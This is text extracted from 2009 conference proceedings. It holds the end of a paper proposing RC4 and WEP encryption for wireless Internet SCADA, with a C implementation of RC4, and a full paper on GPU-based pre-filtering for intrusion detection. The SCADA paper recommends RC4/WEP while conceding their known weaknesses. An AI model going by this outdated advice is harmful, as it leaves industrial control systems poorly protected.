Fig. 2. Wireless SCADA

Symmetric-Key Encryption for Wireless Internet SCADA

293

Modern SCADA Host MMI's like NetSCADA can easily accommodate many different types of industrial protocols and the architecture allows multiple clients to view the same data and seamless expansion to handle additional remote sites and i/o points. Wireless SCADA systems can range from simple Point-Multipoint systems like the 900-MB Spread Spectrum system below using Modbus protocol:

5 Internet SCADA Conventional SCADA only have 4 components: the master station, plc/rtu, fieldbus and sensors. Internet SCADA replaces or extends the fieldbus to the internet. This means that the Master Station can be on a different network or location. In figure 3, you can see the architecture of SCADA which is connected through the internet. Like a normal SCADA, it has RTUs/PLCs/IEDs that can be connected wirelessly. The SCADA Service Provider or the Master Station. This also includes the useraccess to SCADA website. This is for the smaller SCADA operators that can avail the services provided by the SCADA service provider. It can either be a company that uses SCADA exclusively. Another component of the internet SCADA is the Customer Application which allows report generation or billing. Along with the fieldbus, the internet is an extension. This is setup like a private network so that only the master station can have access to the remote assets. The master also has an extension that acts as a web server so that the SCADA users and customers can access the data through the website of the SCADA provider. One may wonder why we need to connect SCADA on the Internet even though there are a lot of issues surrounding it. The answer is because of many advantages it presents like the following. [6] ƒ ƒ ƒ ƒ ƒ ƒ ƒ

Wide area connectivity and pervasive Routable Parallel Polling Redundancy and Hot Standby Large addressing range Integration of IT to Automation and Monitoring Networks Standardization

Fig. 3. Internet SCADA Architecture [5]

294

R.J. Robles and M.-K. Choi

5.1 Internet SCADA Issues Prior to connecting SCADA to the Internet, It is already surrounded by many security Issues and now the Internet has made them more vulnerable to attacks. Consequently, the security of SCADA-based systems has come into question as they are increasingly seen as extremely vulnerable to cyberwarfare/cyberterrorism attacks.[7][8] Here are the common security issues in SCADA: ƒ ƒ ƒ ƒ ƒ

The lack of concern about security and authentication in the design, deployment and operation of existing SCADA networks. The belief that SCADA systems have the benefit of security through obscurity through the use of specialized protocols and proprietary interfaces. The belief that SCADA networks are secure because they are purportedly physically secured. The belief that SCADA networks are secure because they are supposedly disconnected from the Internet. IP Performance Overhead of SCADA connected to the Internet.

6 Utilization of Symmetric Key Encryption Symmetric-key algorithms are a class of algorithms for cryptography that use trivially related, often identical, cryptographic keys for both decryption and encryption. The encryption key is trivially related to the decryption key, in that they may be identical or there is a simple transform to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. [9] Symmetric-key algorithms can be divided into stream ciphers and block ciphers. Stream ciphers encrypt the bytes of the message one at a time, and block ciphers take a number of bytes and encrypt them as a single unit. Blocks of 64 bits have been commonly used; the Advanced Encryption Standard algorithm approved by NIST in December 2001 uses 128-bit blocks. [9] 6.1 RC4 Cipher RC4 is a stream cipher designed by Rivest for RSA Data Security (now RSA Security). It is a variable key-size stream cipher with byte-oriented operations. [10] It is the most widely-used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). [11] While remarkable for its simplicity and speed in software, RC4 has weaknesses that argue against its use in new systems. [12] It is especially vulnerable when the beginning of the output keystream is not discarded, nonrandom or related keys are used, or a single keystream is used twice; some ways of using RC4 can lead to very insecure cryptosystems such as WEP. The algorithm is based on the use of a random permutation. Analysis shows that the period of the cipher is overwhelmingly likely to be greater than 10100. Eight to sixteen machine operations are required per output byte, and the cipher can be

Symmetric-Key Encryption for Wireless Internet SCADA

295

expected to run very quickly in software. Independent analysts have scrutinized the algorithm and it is considered secure. [11] Many stream ciphers are based on linear feedback shift registers (LFSRs), which while efficient in hardware are less so in software. The design of RC4 avoids the use of LFSRs, and is ideal for software implementation, as it requires only byte manipulations. It uses 256 bytes of memory for the state array, S[0] through S[255], k bytes of memory for the key, key[0] through key[k-1], and integer variables, i, j, and k. Performing a modulus 256 can be done with a bitwise AND with 255. Here is a simple implementation in C: unsigned char S[256]; unsigned int i, j; /* KSA */ void rc4_init(unsigned char *key, unsigned int key_length) { for (i = 0; i < 256; i++) S[i] = i; for (i = j = 0; i < 256; i++) { unsigned char temp; j = (j + key[i % key_length] + S[i]) & 255; temp = S[i]; S[i] = S[j]; S[j] = temp; } i = j = 0; } /* PRGA */ unsigned char rc4_output() { unsigned char temp; i = (i + 1) & 255; j = (j + S[i]) & 255; temp = S[j]; S[j] = S[i]; S[i] = temp; return S[(temp + S[j]) & 255]; } #include <stdio.h> #include <string.h> #include <stdlib.h> int main() { unsigned char test_vectors[3][2][32] = { {"Key", "Plaintext"}, {"Master", "station"}, {"control", "remote RTU"} }; int x; for (x = 0; x < 3; x++) { int y;

296

R.J. Robles and M.-K. Choi

rc4_init(test_vectors[x][0], strlen((char*)test_vectors[x][0])); for (y = 0; y < strlen((char*)test_vectors[x][1]); y++) printf("%02X", test_vectors[x][1][y] ^ rc4_output()); printf("\n"); } return 0; }

7 Symmetric Key Encryption in Wirelss SCADA Environment WEP was included as the privacy of the original IEEE 802.11 standard. WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. It can be implemented to wireless SCADA as it is implemented to other wireless systems. Messages between remote RTU's can be converted to ciphertext by utilizing this mechanism. Figure 4 shows how this is done.

Fig. 4. Standard WEP Encryption in Wireless SCADA environment

8 Conclusion Wireless Internet based SCADA systems can provide access to real-time data display, alarming, trending, and reporting from remote equipment. However, it also presents some vulnerabilities and security issues. In this paper, we discuss how to set up SCADA through a wireless medium to the internet. We also discuss the advantages it brings and also some security issues surrounding it. The use of symmetric key encryption specifically the RC4 cipher was also proposed. It can provide security to the data that is transmitted from the SCADA master and the remote assets and also communication between remote RTU’s. Once a system is connected to the internet, it is not impossible for other internet users to have access to the system that is why encryption should be implemented. Data and report generation is also in demand so the internet SCADA is designed to have a web based report generation system through http. And to cut off the budget , we suggest in this paper to set it up in a wireless environment.

Symmetric-Key Encryption for Wireless Internet SCADA

297

Acknowledgments. This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy.

References 1. Wikipedia, Wireless, http://en.wikipedia.org/wiki/Wireless 2. Hildick-Smith, A.: Security for Critical Infrastructure SCADA Systems. techFAQ "What is SCADA? (2005), http://www.tech-faq.com/scada.shtml (accessed: May 2008) 3. BENTEK SYSTEMS, Wireless SCADA, http://www.scadalink.com/support/wireless_scada.html (accessed: May 2008) 4. Wallace, D.: Control Engineering. How to put SCADA on the Internet (2003), http://www.controleng.com/article/CA321065.html (accessed: January 2009) 5. Internet and Web-based SCADA, http://www.scadalink.com/technotesIP.htm (accessed: January 2009) 6. Maynor, D., Graham, R.: SCADA Security and Terrorism: We’re Not Crying Wolf, http://www.blackhat.com/presentations/bh-federal-06/ BH-Fed-06-Maynor-Graham-up.pdf (accessed: January 2009) 7. Lemos, R.: SCADA system makers pushed toward security (2006-07-26), http://www.securityfocus.com/news/11402 (accessed: January 2009) 8. Wikipedia, Symmetric-key algorithm, http://en.wikipedia.org/wiki/Symmetric_cipher (accessed: June 2009) 9. RSA LAboratories "What is RC4?", http://www.rsa.com/rsalabs/node.asp?id=2250 (accessed: June 2009) 10. Wikipedia "RC4", http://en.wikipedia.org/wiki/RC4 11. "RC4", http://www.wisdom.weizmann.ac.il/~itsik/RC4/rc4.html (accessed: June 2009)

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection Based on Many-Core GPU Chengkun Wu , Jianping Yin, Zhiping Cai, En Zhu, and Jieren Cheng School of Computer Science, National University of Defense Technology, 410073, Changsha, Hunan Province, China {chengkun_wu,jpyin,zpcai,enzhu,jrcheng}@nudt.edu.cn

Abstract. Multi-pattern search is a time-consuming task in Network Intrusion Detection Systems(NIDS). The processing ability of NIDS cannot catch up with the rapid development of network bandwidth. One intuitive idea is to use pre-filtering to reduce the workload of NIDS. Our goal is to design a novel method for per-filtering which will be ready for an efficient implementation on many-core GPU. Through statistical analysis, we propose a rudimentary method to use 2B ASCII sub patterns as the filter keywords. To reduce the size of the filter keyword set, we use Binary Integer Linear Programming(BILP) for optimization. The number of filter keywords is reduced from 4824 to 362, which is also much smaller then the prefix based and suffix based method. We argue that our method can well utilize the computation power of GPU. Experiments demonstrate that our pre-filter can achieve a good fiter ratio, thus alleviate the burden of NIDS. Keywords: NIDS, pre-filtering, keyword set construction, BILP, GPU.

1

Introduction

Network Intrusion Detection Systems(NIDS) can scan the payload of captured packets for malicious behaviors. The payload scan, however, is a computationally intensive task. Take Snort for example [1], the payload scanning can consume up to 70% of the execution time [2]. Currently, the processing ability of NIDS cannot catch up with the rapid development of network bandwidth, which makes the NIDS overloaded, thus increases the risk of false negatives. Many researchers have been focused on faster multi-pattern matching techniques, such as efficient multi-pattern matching algorithms [3,4,5] and hardwarespecialized implementation [6, 7, 8, 9]. Those methods have improved the throughput of the NIDSs a lot, however, there are still some defects. Software based methods are not fast enough, hardware based techniques are too expensive and weak in adaptability and scalability. One notable thing is that not all packets are malicious. As a matter of fact, in 

This work is supported by the National Natural Science Foundation of China (NO.60603015, NO.60603062), Science Foundation of Hunan Province(06JJ3035).

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 298–305, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection

299

most cases the network traffic is mainly composed of unmalicious packets. If we can find efficient ways to filter out those normal packets expeditiously before carrying out the time-consuming pattern matching operations, the workload of NIDS will be dramatically reduced. There are also some hardware based methods, but for the same reasons as mentioned above, we need to find some more prospective ways. The emerging SIMD GPUs like NVIDIA G80 [10] is a competitive candidate for pre-filter implementation. Most recently, some researchers have done some work on pattern matching for network security using GPU [11, 12, 13]. A typical SIMD GPU has several Multi-Processors(MP) and each MP is composed of multiple Stream Processors(SP). Each SP can execute several threads at the same time, thus a GPU can support thousands of threads, which provides great computation power for computationally intensive tasks [10]. Moreover, it can work asynchronously with the CPU, which can help reduce the overhead introduced by pre-filtering. In this paper, we first propose an intuitive method for the construction of the keyword set for pre-filtering, then we introduce the Binary Integer Linear Programming (BILP) to optimize the construction, which will help improve the efficiency of pre-filtering. Using our method, the resulting keyword set will be ready for an efficient pre-filtering implementation on GPU. We also explain why our method can well utilize the computation power of GPU.

2

Use Sub-patterns for Packets Pre-filtering

The basic idea of packet pre-filtering comes from the following fact: not every packet contains attack patterns designated by the NIDS’s rules. As a result, we can divide the processing into two phases: firstly, use the pre-filter to filter out normal traffic that do not contain attack patterns; secondly, perform a full pattern matching on the remaining packets against the pattern set. This two-phase processing can greatly reduce the time required for the full pattern matching, 2.1

Statistic Analysis

We did some statistic analysis of the probability of all possible 2 consecutive ASCII bytes’s(a char string with a length of two) appearance on MIT’s 1999 normal traffic trace: We went through each packet of the trace file, a 2B string’s appearing probability equals to the number of its occurrences in different packets divides the total number of packets in the trace. The results are shown in Table 1. The 1st and 2nd columns gives the probability of the most often seen 2B strings in the trace, the 3rd and 4th columns gives the probability of the least often seen 2B strings in the trace, the average probability of all possible 65536 2B strings(256 × 256) is listed together. We can get several hints from the above table: (1) Different strings differ a lot in their appearance probability; (2) The average appearing probability is low;

300

C. Wu et al. Table 1. 2B char string’s appearing probability 2B String Probability 2B String Probability (32, 32) 0.03729 ( 89,239) 2.936E-06 ( 0, 0) 0.01249 (239,141) 2.904E-06 (13, 10) 0.00658 ( 84,223) 2.895E-06 (32,124) 0.00445 (239, 67) 2.873E-06 (61, 34) 0.00425 (179,239) 2.724E-06 Average 1.526E-05

(3) The most frequent 2B strings are trivial ones: (32,32) is two consecutive space character, (0,0) is two consecutive string terminator. We can also infer that n byte strings(n ≥ 3) will have even lower appearance probability. But as we can see from the Table, the average appearance probability of 2B strings is low enough(1.526E-05), which can help achieve good results. Moreover, longer filter keyword will increase the processing complexity and time, so we only discuss the 2B filter keyword in this paper. 2.2

Sub-patterns

In this paper, we use the de-facto NIDS Snort’s pattern set [1]. We construct our pre-filter based on the above idea and the characteristics of Snort patterns distribution. We choose a number of sub-patterns as the filter keyword. Let the packets go through the filter, if we find no match of any sub patterns in the incoming packet content, the packet can be passed, otherwise, the packet will be handed to the full pattern matching engine for a further check. The framework is depicted in Fig.1. To achieve a good filtering result, the filter keywords(the sub patterns) should have a low appearance probability. However, longer pattern length will increase Pre-filter Sub Pat #1

Packets

Sub Pat #2

Match Found

Full Pattern Match Engine

Sub Pat #n

No Match

Pass

Fig. 1. Simplified framework for NIDS with a pre-filter

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection

301

the complexity and processing time. In this paper, we set the sub pattern length to be 2 bytes. Common ways to find such filter sub patterns include: using prefix, using suffix, using all sub strings. Prefix and suffix based methods are the most popular ones, but our work shows that sub strings based method can achieve better results. The rudimentary keyword set can be constructed by selecting one sub pattern of each pattern. As a result, the size of the keyword set is equal to the size of the pattern set. Currently, there are thousands of Snort patterns. This is too large, so we need to optimize our construction.

3

Use BILP to Optimize the Choice of Filter Sub Patterns

As mentioned above, a smaller keyword set will lead to more efficient pre-filtering effects, in this section, we will discuss how to reduce the size of the set by using Binary Integer Linear Programming(BILP). 3.1

Basic Idea

A fact is that different patterns may share some common sub patterns. This is the key for our optimization. Given two pattern p1 , p2 , if they have the same sub pattern s, we say s can represent p1 and p2 in the pre-filtering phase. If we choose s as the filter keyword, then the size of the keyword set K is decreased by 1. In fact, many patterns in the Snort pattern set share sub patterns, so choosing common shared sub patterns is a good way to reduce the size of K. But in order not to affect the effects of pre-filtering, the chosen sub patterns should have a relatively low appearance probability. So this problem becomes a selection problem: we need to select some sub patterns from the rudimentary keyword set, with a goal of reducing the size of K and the keywords appearance probability as much as possible. 3.2

BILP Based Optimization

we can formalize the problem as follows: Given a pattern set P = {p1 , p2 , . . . , pn }, a rudimentary keyword set K = {k1 , k2 , . . . , km }, the appearance probability of all keywords P rob = {pr1 , pr2 , . . . , prm }, a relation matrix R = {r(i,j) | r(i,j) = 1 if ki is a sub pattern of pj ,else 0}. We need to find out a choosing set Choose = {c1 , c2 , · · · , cm } which satisfies: (1) ∀ci , ci = 0 or ci = 1, 1 means ki is chosen for the new set, else not; (2) ∀pi , ∃ 1  j  m, s.t r(i,j) = 1 and cj = 1; m  {ci × pri } is as small as possible. (3) i=1

302

C. Wu et al.

The above problem can be stated as a Binary Integer Linear Programming problem(BILP): Min: s.t.:

m 

i=1 ci is i

{ci × pri }

binary; ∀p , ∃ 1  j  m, s.t r(i,j) = 1 and cj = 1;

There are two kinds of input data for the model: the appearance probability of all the sub patterns, the relation matrix which indicates whether a sub pattern belongs to a pattern or not. We can change the input to get the optimization results whenever the pattern set is changed.

4

Advantages in Utilizing GPU

Now we have a relatively small filter keyword set with only several hundred 2B patterns. The keyword set is ready for an efficient pre-filtering implementation using GPU. An schematic image is depicted in Fig.2. The incoming packets are copied to the device meory of GPU, the keyword set is stored on the Shared Memory of each Multiprocessor on the GPU. Each SP(Stream Processor) can execute multiple threads at the same time, with each thread doing the filtering task based on the filter keyword set. Therefore, thousands of packets will be processed in parallel. The results of pre-filtering will be copied to the CPU, and CPU can use the result to determine whether or not to perform a full pattern matching on a specific packet.

Incoming Packets Packet Buffer

Copy

Filter Results

Full PM

Device Memory

Shared Memory

.......

Shared Memory

SP

SP

SP

SP

SP

SP

SP

SP

Final Results

Fig. 2. A schema for pre-filtering using GPU

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection

303

The G80 series and later GPUs are designed to be highly parallel,massivethreading, and many-core processors. They’re optimized for computationintensive applications that execute the same program on many data elements in parallel, namely, the SIMD fashion. Our method is well prepared for an implementation on the SIMD GPU for the following reasons: (1) Uniform Processing GPU is good at uniform processing,which is determined by its SIMD architecture. In our method, all the sub patterns in the keyword set are of the same length, so the processing is almost uniform. (2) A lot of space for parallel processing on GPU The size of the optimized keyword set is 362. The maximum number of concurrent threads of a MP in the GPU is 768 [14]. We can use the fast multi-pattern matching algorithm such as the Aho-Corasick algorithm [15], each thread can run an instance of the matching finite automata and scan the payload of a single packet, then we can have 12288(768*16) threads matching different text in parallel. (3) Fast Data Access on GPU The memory space required for the keyword set is only several kbytes, which can be stored in the shared-memory of GPU, which supports very fast random access. Moreover, once copied onto the GPU, all the sub patterns can reside on the GPU in the whole pre-filtering process, which reduces the number of the time-consuming data exchanges between GPU and CPU.

5

Experiments and Results

In this section, we present our experiments to verify the effectiveness of our method. We use the traffic traces from ”1999 DARPA Intrusion Detection Evaluation Data Set” provided by MIT, including both attack and attack-free traces. 5.1

Sub Patterns Extraction and the BILP Optimization

We use the Snort pattern set(2009-01-20) to extract 2B sub patterns. The number of distinct prefix,suffix,and sub 2B strings are listed in Table.2.

Table 2. Number of Distinct sub Patterns Type Amount 2B Prefix 1162 2B Suffix 1229 2B Sub Strings 4824

304

C. Wu et al.

The BILP method aims at decreasing the size when using sub strings based methods. We run our BILP model on LINGO 11 based on the 2B sub strings generated above. The original number of 2B sub strings is 4824, after optimization, a small set of 362 2B sub strings is obtained. 5.2

Pre-filtering Effects

After optimizing the filter keyword set, we use the traces from MIT to evaluate the effects of pre-filtering. The results are shown in Table.3. The filtered ratio(FR) is calculated in the following way: FR = 1 −

F KM T . TB

(1)

FKMT represents Filter Keyword Match Times, TB means Total Bytes. We obtain FKMT and TB by sending the packets through the pre-filter, then we calculate how many times a match of any filter keyword is found(FKMT), we also record the total number of bytes in the trace(TB). One notable thing is that a match found is not bad: when a match of a filter keyword is found, the matched position can be recorded and sent to the pattern matching engine for further check. That means the pattern matching engine do not need to start the scan from the beginning of the payload. We can also see from Table.3 that when using our optimized 2B sub string method, the FR is higher than 90 percent, which is much better than other methods. Therefore, our optimization makes sense. Moreover, we can see that there is no need to use 3B or longer sub strings, because a longer sub string cannot outplay the 2B sub string too much but add more complexity to computation and optimization. Table 3. Pre-filtering Results Method outside.tcpdump inside.tcpdump 5th Monday Prefix 0.782 0.725 0.844 Suffix 0.747 0.693 0.826 Sub String 0.009 0.161 0.322 Optimized sub string 0.938 0.925 0.957

6

Conclusions and Future Work

In this paper, pre-filtering is introduced to alleviate the workload of the NIDS pattern matching engine. According to our analysis, we chose to use 2B ascii sub patterns as the filter keyword. We also proposed a BILP based method to optimize the filter keyword selection. The size of the keyword set is greatly reduced, from 4824 to 362.

An Efficient Pre-filtering Mechanism for Parallel Intrusion Detection

305

Experiment results on MIT’S IDS evaluation dataset show that the pre-filtering result is quite good. We also pointed out that the pre-filter obtained by our method is well prepared for an implementation on GPU. Future work includes the implementation of the pre-filter on GPU, and a schema using multiple GPUs.

References 1. Snort: the de-facto network intrusion detection system, http://www.snort.org 2. Antonatos, S., Anagnostakis, K.G., Markatos, E.P.: Generating realistic workloads for network intrusion detection systems. ACM SIGSOFT Software Engineering Notes 29, 207–215 (2004) 3. Van Lunteren, J.: High-Performance Pattern-Matching for Intrusion Detection. In: Proceedings of IEEE INFOCOM, pp. 1–13 (2006) 4. Zheng, K., Lu, H.: Scalable Pattern-Matching via Dynamic Differentiated Distributed Detection (D4). In: Proceedings of IEEE GLOBECOM (2008) 5. Song, T., Zhang, W., Wang, D., Xue, Y.: A memory efficient multiple pattern matching architecture for network security. In: INFOCOM, pp. 673–681. Institute of Electrical and Electronics Engineers Inc., Piscataway (2008) 6. Tan, L., Sherwood, T.: A High Throughput String Matching Architecture for Intrusion Detection and Prevention. In: Proceedings of the 32nd annual international symposium on Computer Architecture, vol. 4, pp. 112–122 (2005) 7. Baker, Z.K., Prasanna, V.K.: Time and area efficient pattern matching on FPGAs. In: Proceedings of the 2004 ACM/SIGDA 12th international symposium on Field programmable gate arrays, pp. 223–232. ACM, New York (2004) 8. Dharmapurikar, S., Lockwood, J.W.: Fast and scalable pattern matching for network intrusion detection systems. IEEE Journal on Selected Areas in Communications 24, 1781–1791 (2006) 9. Yu, F., Katz, R.H., Lakshman, T.V.: Gigabit rate packet pattern-matching using TCAM. In: Proceedings of the 12th IEEE International Conference on Network Protocols, pp. 174–183 (2004) 10. Nvidia G80 Specs, http://www.nvidian.com/page/8800_features.html 11. Marziale, L., Richard, G.G., Roussev, V.: Massive threading: Using GPUs to increase the performance of digital forensics tools. Digital Investigation 4, 73–81 (2007) 12. Vasiliadis, G., Antonatos, S., Polychronakis, M., Markatos, E.P., Ioannidis, S.: Gnort: High performance network intrusion detection using graphics processors. In: Lippmann, R., Kirda, E., Trachtenberg, A. (eds.) RAID 2008. LNCS, vol. 5230, pp. 116–134. Springer, Heidelberg (2008) 13. Goyal, N., Ormont, J., Smith, R., Sankaralingam, K., Estan, C.: Signature Matching in Network Processing using SIMD/GPU Architectures. UW CS technical report 1628 (January 2008) 14. Nvidia CUDA Programming Guide 2.1, http://developer.download.nvidia.com/compute/cuda/2_1/ NVIDIA_CUDA_Programming_Guide_2.1.pdf 15. Aho, A.V., Corasick, M.J.: Efficient String Matching: An Aid to Bibliographic Search. Communications of the ACM 18, 333–340 (1975)

Author Index

Ahmad, Yasir 9 Ahmadinejad, Seyed Hossein Almazyad, Abdulaziz S. 9 Au, Man Ho 234

18

Babu, A. Vinaya 281 Bandyopadhyay, Samir Kumar 43, 64 Bhattacharyya, Debnath 43, 64 Cai, Zhiping 132, 176, 298 Carvalho, David A. 265 Chang, Feng-Cheng 1 Cheng, Jieren 132, 176, 298 Chin, Ji-Jian 93 Cho, Jeonghun 100 Choi, Jongmyung 26 Choi, Min-Kyu 289 Chung, Bo-heung 51 Das, Poulami 43, 64 Deng, Robert 242 Drahansk´ y, Martin 217, 225 Fang, Wai-Chi 1 Freire, M´ ario M. 265 Goi, Bok-Min 93 Gunawan, Linda Ariani 72 Gupta, Phalguni 157, 201 Han, Min-ho 51 Han´ aˇcek, Petr 217, 225 He, Hong-qi 140 Heng, Swee-Huay 93 Herrmann, Peter 72 Hong, Jaeseung 100 Huang, Hsiang-Cheh 1 Huang, Qiong 234 Huh, Eui-Nam 193 Hur, Seung-yong 185 Irani, Mohammad Tabatabai 250 Islam, Mohammad Rakibul 108 Jalili, Saeed 18 Jeong, Jae-goo 185

Jiang, Lie-hui 140 Jin, Haimin 124 Jung, BoHeung 57 Jung, Hyuncheol 165 Kang, DongHo 57 Kim, Jinsang 108 Kim, Jongwung 100 Kim, Ki-young 51, 57 Kim, Tai-hoon 43, 64 King, Brian 273 Kisku, Dakshina Ranjan 157, 201 Ko, Hoon 26 Kraemer, Frank Alexander 72 Lee, Gang-Soo 185 Lee, Kyung-Seok 165 Li, Ji-zhong 140 Li, Tieyan 242 Li, Yingjiu 242 Li, Zhenhao 148 Liu, Chengyu 116 Liu, Tie-Ming 140 Liu, Yun 132, 176 Mu, Yi 234 Muyaha, Fahad bin

86

Nagy, Jan 217 Naidu, G.A. 281 Niu, Hanhui 116 Ogiela, Marek R. 35 Ogiela, Urszula 35 Ors´ ag, Filip 225, 258 Pecho, Peter 217 Pereira, Manuela 265 Rahim, Aneel 86 Raju, M.S.V.S. Bhadri 281 Ramos, Carlos 26 Reddy, L. Pratap 281 Ren, Jinglei 148 Robles, Rosslin John 289

308

Author Index

Sing, Jamuna Kanta Song, Biao 193 Sun, Chen 148 Susilo, Willy 234

157, 201

Thorncharoensri, Pairat Tian, Minli 116 Tian, Yuan 193 Vardhan, B. Vishnu

234

281

Wei, Yonglong 148 Weippl, Edgar R. 250 Wong, Duncan S. 124, 234 Wu, Chengkun 132, 298

Xu, Yinlong

124

Yan, Qiang 242 Yang, Hengsheng 116 Yang, Na 116 Yin, Jianping 132, 176, 298 Yoon, Seokung 165 Yu, Xian 140 Zhai, Gaoshou 116 Zhang, Boyun 176 Zheng, Xiaojuan 148 Zheng, Xudong 148 Zhu, En 298 Ziauddin, Sheikh 209